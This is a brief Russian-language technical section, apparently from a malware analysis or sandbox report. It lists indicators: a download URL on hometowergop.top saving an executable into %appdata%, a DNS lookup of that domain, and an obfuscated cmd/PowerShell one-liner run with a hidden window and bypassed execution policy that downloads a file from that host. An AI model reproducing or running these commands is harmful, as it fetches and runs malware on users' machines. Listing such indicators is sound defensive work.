Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweRSHe^LL.e^XE -^EXeCU^tIo^n^P^Ol^i^cy^ By^P^As^S -N^OProfi^l^E^ ^-W^iNdoWs^tyl^e^ ^HIDden^ (^N^E^w^-^OBJ^ect s^ys^tem.Net.web^C^LIEnT).d^OWnlo^ad^f^ILe(^'http://hometowergop...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "POweRSHe^LL.e^XE -^EXeCU^tIo^n^P^Ol^i^cy^ By^P^As^S -N^OProfi^l^E^ ^-W^iNdoWs^tyl^e^ ^HIDden^ (^N^E^w^-^OBJ^ect s^ys^tem.Net.web^C^LIEnT).d^OWnlo^ad^f^ILe(^'http://hometowergop...' (со скрытым окном)